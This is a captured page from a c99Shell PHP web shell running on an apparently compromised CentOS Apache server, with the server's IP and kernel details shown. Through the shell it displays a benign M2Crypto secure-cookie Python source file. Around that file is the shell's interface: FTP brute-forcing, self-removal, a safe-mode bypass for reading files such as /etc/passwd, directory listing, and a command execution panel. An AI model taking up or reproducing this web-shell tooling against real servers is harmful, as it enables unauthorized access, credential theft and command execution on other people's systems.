110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /usr/lib/python2.4/site-packages/M2Crypto/ drwxr-xr-x Free 50.78 GB of 127.8 GB (39.73%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


"""Secure Authenticator Cookies

Copyright (c) 1999-2002 Ng Pheng Siong. All rights reserved."""

# M2Crypto
import Rand, m2

# Python. Cookie is bundled with Python 2.x. 
import Cookie, binascii, re, time


_MIX_FORMAT = 'exp=%s&data=%s&digest='
_MIX_RE     = re.compile('exp=(\d+\.\d+)&data=(.+)&digest=(\S*)')

def mix(expiry, data, format=_MIX_FORMAT):
    return format % (repr(expiry), data)

def unmix(dough, regex=_MIX_RE):
    mo = regex.match(dough)
    if mo:
        return float(mo.group(1)), mo.group(2)
    else:
        return None

def unmix3(dough, regex=_MIX_RE):
    mo = regex.match(dough)
    if mo:
        return float(mo.group(1)), mo.group(2), mo.group(3)
    else:
        return None


_TOKEN = '_M2AUTH_'

class AuthCookieJar:

    _keylen = 20

    def __init__(self):
        self._key = Rand.rand_bytes(self._keylen)
    
    def _hmac(self, key, data):
        return binascii.b2a_base64(m2.hmac(key, data, m2.sha1()))[:-1]
        
    def makeCookie(self, expiry, data):
        dough = mix(expiry, data)
        return AuthCookie(expiry, data, dough, self._hmac(self._key, dough))

    def isGoodCookie(self, cookie):
        assert isinstance(cookie, AuthCookie)
        if cookie.isExpired():
            return 0
        c = self.makeCookie(cookie._expiry, cookie._data)
        return (c._expiry == cookie._expiry) \
            and (c._data == cookie._data) \
            and (c._mac == cookie._mac) \
            and (c.output() == cookie.output())

    def isGoodCookieString(self, cookie_str):
        c = Cookie.SmartCookie()        
        c.load(cookie_str)
        if not c.has_key(_TOKEN):
            return 0
        undough = unmix3(c[_TOKEN].value)
        if undough is None:
            return 0
        exp, data, mac = undough
        c2 = self.makeCookie(exp, data)
        return (not c2.isExpired()) and (c2._mac == mac)


class AuthCookie:
    
    def __init__(self, expiry, data, dough, mac):
        self._expiry = expiry
        self._data = data
        self._mac = mac
        self._cookie = Cookie.SmartCookie()
        self._cookie[_TOKEN] = '%s%s' % (dough, mac)
        self._name = '%s%s' % (dough, mac)  # XXX WebKit only.

    def expiry(self):
        """Return the cookie's expiry time."""
        return self._expiry

    def data(self):
        """Return the data portion of the cookie."""
        return self._data

    def mac(self):
        """Return the cookie's MAC."""
        return self._mac

    def output(self):
        """Return the cookie's output in "Set-Cookie" format."""
        return self._cookie.output()

    def value(self):
        """Return the cookie's output minus the "Set-Cookie: " portion.
        """
        return self._cookie[_TOKEN].value

    def isExpired(self):
        """Return 1 if the cookie has expired, 0 otherwise."""
        return (time.time() > self._expiry)

    # XXX Following methods are for WebKit only. These should be pushed 
    # to WKAuthCookie.
    def name(self):
        return self._name

    def headerValue(self):
        return self.value()

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: